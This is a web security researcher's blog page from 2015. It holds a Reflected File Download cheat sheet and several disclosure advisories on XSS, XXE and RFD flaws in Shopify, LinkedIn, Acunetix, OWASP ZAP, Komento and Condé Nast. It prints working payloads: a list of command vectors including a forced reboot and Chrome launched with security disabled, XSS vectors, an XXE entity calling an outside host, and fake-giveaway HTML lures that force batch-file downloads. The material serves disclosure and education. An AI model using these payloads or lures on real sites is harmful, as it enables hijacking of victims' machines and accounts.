David Sopas

web security researcher

David Sopas – Web Security Researcher
03/08/15 Warning # ,

It wasn’t me…

Some people say that it’s the price of fame but I don’t think it’s the case.
Someone is using my name and reputation to contact site owners and sell their security services. Apparently it’s a guy from Pakistan with the Paypalcaxper.pay@gmail.com.

Continue reading

7 likes no responses
06/10/15 Papers # , , , ,

Reflected File Download Cheat Sheet

Reflected File Download Cheat Sheet

This article is focused on providing infosec people how to test and exploit a Reflected File Download vulnerability – discovered by Oren Hafif of Trustwave. This vulnerability is not very well known but if well implemented could be very dangerous.
I’ve been writing security reports on RFD since January 2015 (most still undisclosed) and found lot’s of interesting things based on that experience that I would like to share.
I’m not explaining in this cheat sheet what RFD is or make a fancy presentation about it. For that you have Oren Hafif Blackhat presentation and Trustwave paper.


0x1 Where to look

Most of the RFD attacks are found on JSON and JSONP APIs [like auto-complete, user information, search box, order filters, etc.]. Most modern web applications this days use it.
You should start looking into your proxy [Burp, ZAP, etc] or Google Inspector for XHR requests. They’re are usually the prime suspect to find RFD attacks.
Don’t discard other requests like scripts. I already found a RFD attack on a JS file on Google which got me a entry on their Hall-of-Fame.
So keep your eyes open and think outside-the-box.


0x2 How to test it

Try to see if a callback parameter is present on the request:


If callback is present try to change it to calc.


If calc is reflected on the screen it’s a good thing. If not maybe the victim has a whitelist of callbacks. But don’t give up yet. Try to find other parameter that could be reflected.
In my example you can see term parameter. Try to inject the following search term:


If the double-quote is slashed and pipe chars are not encoded you got the attack reflected.


Important: Even if the callback is not present in the request try to inject it. Most of the cases it’s there :)

If you can’t inject a callback try to inject the vector on another parameter that is reflected. Take in mind that it should be accessible to anyone not only by you. No Self-RFD in here :)

Ok so you have a reflected callback or reflected injected parameter. What we’ll try next is filename manipulation if URL mapping is permissive.

Some things you might try:


You can use other extensions also. Use your imagination. You can use .bat, .cmd, .js, .vbs and even other formats to attack *nix users – http://blog.davidvassallo.me/2014/11/02/practical-reflected-file-download-and-jsonp/


0x3 Can’t get download dialog

If the server don’t have Content-Disposition: attachment header to force the download you must use HTML5 download attribute to do this. On Internet Explorer 8 and 9, which interpret JSON as attachment, it will automatically try to download.

HTML5 download attribute is available in the following browsers:

  • Chrome
  • Firefox (you need to hack it a little to work)
  • Opera

Example 1:

<a href="https://www.example-site.pt/api/setup.bat?callback=chkdsk" download="setup.bat">Download</a>;

In Example 1 you can just click the link Chrome and Opera will download search.bat. On Firefox you must force the “Save link as” by adding on the:

<a href> onclick="return false;"

Example 2:

<a href="https://www.example-site.pt/api/setup.json?callback=chkdsk" download="setup.bat">Download</a>;

Just by clicking on the Download link Chrome and Opera will download setup.json. You must force the download with “Save link as” like Firefox. So:

<a href="https://www.example-site.pt/api/setup.json?callback=chkdsk" download="setup.bat" onclick="return false">Download</a>

Reminder: Keep noticing what is the returned HTTP code. It must be 200. 401 and 403 will not lead to RFD attacks.


0x4 Real Scenarios (all of them fixed)

Desk @ http://www.davidsopas.com/desk-com-reflected-filename-download/

Desk web app allowed a malicious user to have a direct URL to a malicious download.
Because they had Content-Disposition: attachment header this URL:

Worked in every browser – downloading it without using any other manipulation. An example of a perfect RFD attack.

Acunetix @ https://www.davidsopas.com/acunetix-got-rfded/

Needed to use a special crafted webpage to download the file so this one it’s a nice example of the HTML5 download attribute.

Google @ http://www.websegura.net/advisories/reflected-filename-download-on-google/

This one is to show you guys that you don’t need a JSON file to get a RFD attack. Even a JS file which reflects your information will do the job.


0x5 RFD vectors

If you want to just give a proof-of-concept to a vendor you can just use a innocent calc from Windows or open a Chrome window with your site.
If you want to demonstrate with other vectors I give you a small list:

  • calc [runs Windows calculator]
  • chkdsk [runs Windows check disk utility]
  • start chrome davidsopas.com/poc/malware.htm [open a new chrome window with the defined URL]
  • start chrome davidsopas.com/poc/malware.htm –disable-web-security –disable-popup-blocking [open a new chrome
  • window with security options disabled with the defined URL]
  • shutdown -t 0 -r -f [force a Windows immediate reboot]

Don’t forget that you can use any command you wish depending on the operating system of the victim.


0x6 Bonus tricks

  • Sometimes you may enconter callbacks being filtered for spaces and special chars. If this is the case you can always use a RFD vector that fits this filtering (check 0x5 RFD vectors).
  • If the executable file is a .bat file don’t forget that there’s a limit on it’s content. If the JSON file you are using is too big, the batch file will not run your RFD attack. Try removing some of the parameters to reduce the lenght of the file.
  •  JSON/JSONP error messages sometimes could be your best friend. Some of them reflect the parameters you inject and return a HTTP 200 code.
  • If request header accepts text/html and tags are not filtered you can try inject a callback with HTML and make it a Reflected XSS:

https://www.example-site.pt/api/search.htm?term=f00bar&callback=calc<svg onload=prompt(1)>

  • If you can’t get a reflected vector on the request and you have a URL which is accessible to authenticated users you can use fields to inject the RFD vector.


{"id":"1234567", "name":"David Sopas"}

You can inject your RFD vector:


on your name and use your link to attack.

{"id":"1234567", "name":"\";||calc||"}

This shows that sometimes you don’t even need the callback or parameter on the URL to use a RFD attack.

  • If your .bat don’t run, copy-paste it’s content to cmd.exe and check what it’s going on.
  • Sometimes when you call the XHR URL directly it shows you the file in XML. Add ?format=json and you might get lucky!


0x7 How to fix it

I think the best solution is to use the header Content-Disposition with a defined filename:

Content-Disposition: attachment; filename=1.txt

That way it’s impossible (so far) to modify the filename and most important filename extension.
Also if you use callbacks try to whitelist them. Finally encode (not escape) values reflected on the request.


0x8 Affected sites/companies

Should I be worried about RFD? YES!
Imagine a way of tricking victims into downloading a malicious filename using your domain? It’s very important to think that this is not a social-engineering attack but it only uses part of it (abusing human-factor) to gain trust of your client into downloading a file [that you didn’t upload]
If your client or visitor is not a security expert and is just a normal Internet user he will trust the link, download the file and execute it. People are doing this even without the trusted domain imagine with that option.

Oren Hafif said in his BlackHat presentation:

4 out of 5 would trust downloads based on the hosting domain.
RFD uses trust to do evil.

My advice is… Patch it before it too late.


0x9 Thanks

Oren Hafif -> for discovering this type of vulnerability
David Vassallo -> for showing a *nix version of the RFD attack
Ashar Javed -> for giving me the idea of publishing this cheat sheet about RFD and for calling me “RFD Machine” :)


0xA Other related Reflected File Download links

0 likes no responses
30/09/15 Advisories # , , , , , ,

Komento Joomla! component Persistent XSS

Komento Joomla! component Persistent XSS

CVE Reference: CVE-2015-7324

Komento is a Joomla! comment extension for articles and blogs in K2, EasyBlog, ZOO, Flexicontent, VirtueMart and redShop.


I found out that was possible to launch a Persistent XSS attack when adding a new comment using the WYSIWYG website and image buttons.
This issue was critical in both environments – frontend and backoffice.

In frontend when a user visited a page where the comment has a XSS attack it would be automatically affected.
In the other side – the backoffice – when the admin checked the new comment it would be vulnerable to this attack and could get his account hijacked or something even more dangerous.

What I did was to pass along the XSS vector in the [img] code and use the Javascript onload to run the exploit when image loads.

Proof-of-concept using [img]:

[img]http://www.robolaranja.com.br/wp-content/uploads/2014/10/Primeira-imagem-do-filme-de-Angry-Birds-%C3%A9-revelada-2.jpg” onload=”prompt(1)[/img]

Proof-of-concept using [url]:

[url=”https://www.davidsopas.com” onmouseover=”prompt(1)”]Your text to link[/url]


In the [img] case this will reflect the following HTML (on the frontend):

<img src="http://www.robolaranja.com.br/wp-content/uploads/2014/10/Primeira-imagem-do-filme-de-Angry-Birds-%C3%A9-revelada-2.jpg" data-pagespeed-onload="prompt(1)" alt="http://www.robolaranja.com.br/wp-content/uploads/2014/10/Primeira-imagem-do-filme-de-Angry-Birds-%C3%A9-revelada-2.jpg" onload="prompt(1)" style="max-width:300px;max-height:300px;" onload="var elem=this;if (this==window) elem=document.body;elem.setAttribute('data-pagespeed-loaded', 1)"/>



<img src="http://www.robolaranja.com.br/wp-content/uploads/2014/10/Primeira-imagem-do-filme-de-Angry-Birds-%C3%A9-revelada-2.jpg" data-pagespeed-onload="prompt(1)" alt="http://www.robolaranja.com.br/wp-content/uploads/2014/10/Primeira-imagem-do-filme-de-Angry-Birds-%C3%A9-revelada-2.jpg" onload="prompt(1)" style="max-width:300px;max-height:300px;">

In the administrator area.

This Joomla! component has lot’s of Google results and can affect a large number of innocent people. A victim just by visiting the page with a malicious comment will be affected.

All versions prior to 2.0.5 are affected.
Vendor already patched both security issues in the new version 2.0.5 – http://stackideas.com/changelog/komento

0 likes no responses
29/09/15 Interesting Readings # , ,

Bug Hunter Appreciation Programs

Interesting reading about security bug bounty written by Eduardo Vela – http://sirdarckcat.blogspot.pt/2015/09/not-about-money.html

You got to love this part:

It is my view, that we shouldn’t call them “Bug Bounty Programs”, I would like them to be called “Bug Hunter Appreciation Programs”. I don’t like the term “Bug Bounty”, because bounty sounds a lot like it’s money up for grabs, when the attitude is that of a gift, or a “thank you, you are awesome”.

0 likes no responses
29/09/15 Advisories # , , ,

Shopify open to a RFD attack

Shopify open to a RFD attack

Before Shopify having a bounty program on HackerOne I already sent [on 19 march] a security report about a Reflected Filename Download I found on their website.
It doesn’t need any authentication like access_token, api_key or even an account on Shopify.

The problem is located under app.shopify.com service.

On Internet Explorer 9 and 8 browsers if you run the following link:


It will show download dialog with a file named track.bat that after execution it will run Google Chrome with a malicious webpage (in this case it’s only text).
Of course a malicious user could run any operating system command he wishes.

On other browsers like Chrome, Opera, Firefox, Android Browser and Chrome for Android latest versions you need to visit a page which will force the download using HTML5 <A DOWNLOAD> attribute:

<div align="center"> 
<a href="https://app.shopify.com/services/signup/track.bat?callback=foobar&signup_page=http%3A%2F%2Fwww.shopify.com%2F%22||start%20chrome%20davidsopas.com/poc/malware.htm||&_=" download="track.bat">
<img src="http://harleyf.com/wp-content/uploads/2010/03/94_shopify.png" border="0" />
</a> <
h1>Shopify is giving away premium service!</h1> 
<p><i>(Firefox users: Use "Save link as" to download the file)</i></p> 

When the victim visits a specially crafted page with the code above and click the image it will show the download dialog and after downloading it will show that the file is coming from Shopify servers.



So a possible attack scenario will be:

  1. Malicious user sends link to victim like it would with a CSRF or a XSS (phishing campaigns, social networks, instant messengers, posts, etc)
  2. Victim clicks the link and trusting where it came from (Shopify) he downloads it
  3. Victim runs the file and his computer it’s hijacked

To the victim, the entire process looks like a file is offered for download from Shopify original site and it would not raise any suspicious. A malicious user could gain complete control over a victims computer system and launch malicious files that appear to originate from a trusted party.

In my opinion this was the last time I’ll send anything to Shopify. We have different views on patching security reports.
An example: Some of the bounties that they already paid on HackerOne are Self-XSS and Missing SPF. Both issues were awarded with the minimum amount – $500. I don’t know where or why these issues are more dangerous than my security report but it’s up to them.
I was patient and gave them enough time to fix this issue – even sending them possible solutions. More than 6 months on a paid online store service and still unfixed seems to much.

So beware of this issue because according to Shopify they don’t foresee that this issue will be fixed any time soon.

19-03-2015 Reported this security issue to Shopify
27-03-2015 No reply so I asked for a update
06-04-2015 First contact with Shopify which they reply that it’s being processed
15-04-2015 Shopify told me that this security issue is interesting and ask for more information
15-04-2015 I sent more information and new proof-of-concept
04-05-2015 I asked for a update (no reply)
15-06-2015 I asked for another update (no reply)
16-09-2015 I asked for another update
22-09-2015 Since April without any email from Shopify they replied that they were working on fixing more urgent issues and consider mine a low impact and low priority
23-09-2015 I told them that it’s not a social engineering issue but they still don’t understand it
23-09-2015 Shopify told me that their prioritization is not up for discussion and not patching any time soon.
25-09-2015 Full disclosure

0 likes 3 responses
28/09/15 Donations # , , ,

Another donation to APAFF

Another donation to APAFF

I’m always happy when I donate food to a local animal shelter.

This time was:
50kg of senior dog food
60kg of cat food

It’s not enough for more than 150 dogs and 100 cats but it will help them for a while.
I promise that will be more…

0 likes no responses
25/09/15 Interesting Readings , Tips and Tricks # , , , , ,

Yahoo! and other sites vulnerable to Open Redirect

Yahoo! and other sites vulnerable to Open Redirect

A couple of portuguese security researchers published a article about a vulnerability on Linkedin and Yahoo! that allows a malicious user to redirect victims to other sites. The problem is/was located on a vulnerable version of Express – Node.js web application framework.

So with a simple modification in the URL you get a Open Redirect attack:




Both Yahoo! attacks are still open to attack and working in Firefox and Opera browsers.

I found out that many other sites are vulnerable to this attack including MySpace. Just searching on the official ExpressJS site you can get a list of big companies and start-ups vulnerable to this attack – http://expressjs.com/resources/applications.html

This is a easy fix – just update your Express Framework and you’re done!

0 likes no responses
23/09/15 Advisories # , , ,

Acunetix got RFDed!

Acunetix got RFDed!

After publishing a report on a security software – OWASP ZAP – I found another vulnerability on a security company – Acunetix.
Reminds the proverbial saying:

Shoemaker’s son always goes barefoot.

I found a way to trick users into downloading a batch [executable] file that comes from ovs.acunetix.com using a Reflected Filename Download vulnerability.
It was funny how I found this one. I noticed that Acunetix allowed to test vulnerabilities online and I was curious about that web appplication. I register for a demo account and noticed lot’s of XHR requests on my Google Inspector. So I decided to give RFD a try…

This security issue affected almost all XHR requests on ovs.acunetix.comAcunetix Online Vulnerability Scanner. Every request allowed a user to inject a callback with special characters that would allowed me to launch a possible attack.

Take this example:

https://ovs.acunetix.com/rpc/reports/count?sgn=1&callback=start chrome davidsopas.com/poc/malware.htm||

Which reflects on the screen:

start chrome davidsopas.com/poc/malware.htm||({“message”: “get:sgn:invalid size”, “data”: null, “error”: “bad-input”});

It didn’t give any HTTP error:

Request URL:https://ovs.acunetix.com/rpc/reports/count?sgn=1&callback=start%20chrome%20davidsopas.com/poc/malware.htm||
Request Method:GET
Status Code:200 OK
Remote Address:

So I was able to inject a callback that even giving an error on the JSON information it didn’t return a HTTP error.

Because I couldn’t control the filename and force a download I needed to use the HTML5 download attribute.

<div align="center"> 
 <a href="https://ovs.acunetix.com/rpc/reports/count?sgn=1&callback=start chrome davidsopas.com/poc/malware.htm||" download="setup.bat" onclick="return false;">
 <img src="https://www.davidsopas.com/poc/Acunetix_1.jpg" border="0" />
 <h1>Download Acunetix Web Security Scanner for Free!</h1> 
 <p><i>(Use "Save link as" to download the file)</i></p> 

As I said before it happened in almost every XHR requests:


Possible attack scenario:
Because this file can be accessed without authentication a malicious user could use this to attack any user.

  1. Malicious user creates a specially crafted page – similar to my proof-of-concept – promising to download Acunetix web security software.
  2. Victims clicks to download the file [even if the victim checks the source-code of the page they would see the trusted source – acunetix.com]
  3. Victims runs the file and gets hijacked

Acunetix security team fixed this vulnerability very fast proving that they’re on top of things. I wish I could to see other companies follow Acunetix patching timeline.


17-09-2015 Reported to Acunetix
17-09-2015 Acunetix acknowledged the vulnerability
18-09-2015 Acunetix informed me that they fix this security issue
22-09-2015 Full disclosure

0 likes one response
22/09/15 Advisories # , , , ,

OWASP ZAP XXE vulnerability

OWASP ZAP XXE vulnerability

I just noticed that this is my first full disclosure of a XXE vulnerability. I already found others but they were inside private bounty programs.

For those who don’t know OWASP ZAP:

The Zed Attack Proxy (ZAP) is an easy to use integrated penetration testing tool for finding vulnerabilities in web applications.
It is designed to be used by people with a wide range of security experience and as such is ideal for developers and functional testers who are new to penetration testing.
ZAP provides automated scanners as well as a set of tools that allow you to find security vulnerabilities manually.

@ https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project

When checking some files from the application I noticed that there are a lot of XML files so I decided to “play” the XXE (XML External Entity) card to check if it OWASP ZAP was vulnerable. I know that finding this type of local vulnerability is a low level issue specially because you need to have access to the local files of the victim but what if the malicious user wants to backdoor the operating system without the trouble of being detected? Cool idea right?

What I done:

  • Opened config.xml on OWASP ZAP local path
  • Added after the <xml> tag the following code:
<!DOCTYPE foo [ 
 <!ELEMENT foo ANY >
 <!ENTITY xxe SYSTEM "http://davidsopas.com/XXE" >]><foo>&xxe;</foo>
  • Saved it and run OWASP ZAP
  • Checking the logs of davidsopas.com I had:

xx.xx.xxx.xxx – – [14/Aug/2015:16:29:05 +0100] “GET /XXE HTTP/1.1” 301 234 “-” “Java/1.8.0_31”

Keep in mind that config.xml is updated when you run the application so the XXE attack is removed automatically cleaning the tracks of a possible malicious user.
Others XML files could also be vulnerable.

I reported this issue to OWASP ZAP guys and they agree with me that it’s not a critical security issue but they fixed it on the version 2.4.2 – https://github.com/zaproxy/zaproxy/issues/1804 – by disabling processing of XML external entities by default.

They were also nice enough to put my name in their acknowledgement list.
If you don’t use OWASP ZAP give it a try. I use it almost everyday. It’s a excellent pentesting tool and with great online support.

0 likes one response
18/09/15 Advisories # , ,

Linkedin Reflected Filename Download

Linkedin Reflected Filename Download

When researching another website I discovered a XHR request on my Google Inspector on Linkedin that seemed interesting:


Basically it was the request made by websites to count how many shares their site have on Linkedin network.
As a curious security researcher I tried to modify the url parameter to something more interesting:


Which returned:


Url parameter wasn’t validated and it was reflected on the JSON file.
If I downloaded the file and renamed it to .bat it executed the calculator from Windows.
But this is not enough I needed to change the path so it downloads a batch file and use a different windows command.

https://www.linkedin.com/countserv/count/share;setup.bat?url=”||start chrome websegura.net/malware.htm||

Guess what? IE8 downloaded automatically this batch file from a trusted domain – linkedin.com
I wanted to work with other browsers so I needed HTML5 download attribute.

<div align="center"> 
<a href='https://www.linkedin.com/countserv/count/share;setup.bat?url="||start chrome websegura.net/malware.htm||' download="setup.bat" onclick="return false;">
<img src="http://damnlink.com/uploaded_images/godaddy_coupons_and_godaddy_promo_code_3187745288.png" border="0" /></a> 
<h1>Linkedin Premium account!</h1> 
<p><i>(Use "Save link as" to download the file)</i></p> 


So a possible attack scenario would be:

  1. 1. Malicious user sends link to victim like it would with a CSRF or a XSS (phishing campaigns, social networks, instant messengers, posts, etc)
  2. Victim clicks the link and trusting where it came from (Linkedin) he downloads it
  3. Victim runs the file and his computer it’s hijacked

A malicious user could even give more credibility to the HTML5 download site if he uses famous open redirections vulnerabilities on trusted sites like open redirects on Google or even on Linkedin.

To the victim, the entire process looked like a file is offered for download from Linkedin original site and it would not raise any suspicious. A malicious user could gain complete control over a victims computer system and launch malicious files that appear to originate from a trusted party.

Malicious users are always searching for better ways of gaining trust of victims. This could be the right online weapon.

11-05-2015 Sent the report to Linkedin
11-05-2015 Didn’t understand the true nature of the attack
11-05-2015 I replied with more information using other public RFD attacks and Oren Hafif paper about RFD
13-05-2015 Linkedin told me that they’re working in a solution
02-06-2015 I asked for an update
03-06-2015 Linkedin replied that they will give me an update soon
01-07-2015 I asked again for an update
09-09-2015 Linkedin replied that they had fix the issue
18-09-2015 Full disclosure

0 likes 3 responses
16/09/15 Advisories # , , ,

DOM XSS in all Condé Nast sites network

DOM XSS in all Condé Nast sites network

For those who don’t know Condé Nast:

Condé Nast, a division of Advance Publications, is a mass media company headquartered at One World Trade Center in New York City. The company attracts more than 164 million consumers across its 20 print and digital media brands: Allure, Architectural Digest, Ars Technica, Bon Appétit, Brides, Condé Nast Traveler, Details, Epicurious, Glamour, Golf Digest, Golf World, GQ, Lucky, The New Yorker, Self, Teen Vogue, Vanity Fair, Vogue, W and Wired.

A DOM XSS vulnerability present in specific ads page on newyorker.com allowed me to understand that all of their network websites were vulnerable if a user to injected code into the url.

The affected file was displayad.html on ads directory:

<script type="text/javascript">
document.write('<script type="text/javascript" src="' + (location.search.split('req=')[1] || '') + '"></scr'+'ipt>');

location.search.split function is not properly escaped so it was possible to manipulate “req” parameter as we wish.



Other sites on the network:


Keep in mind that these sites brings millions of users every day and these vulnerability in the wrong hands would be very dangerous.
A malicious user could also:

  • Access other sites inside another client’s private intranet.
  • Steal another client’s cookie(s).
  • Modify another client’s cookie(s).
  • Steal another client’s submitted form data.
  • Modify another client’s submitted form data (before it reaches the server).
  • Submit a form to your application on the user’s behalf which modifies passwords or other application data

This was fixed by Condé Nast security team which kept me updated every time showing me that it’s a company that care about security and their clients. Hope they can keep up the good work.

08-09-2015 Asked for a security contact
09-09-2015 First contact with the head of security of Condé Nast
10-09-2015 Sent the report
11-09-2015 Update received that they were clearing cache
14-09-2015 Problem solved
16-09-2015 Full disclosure

0 likes no responses
1 2 3 4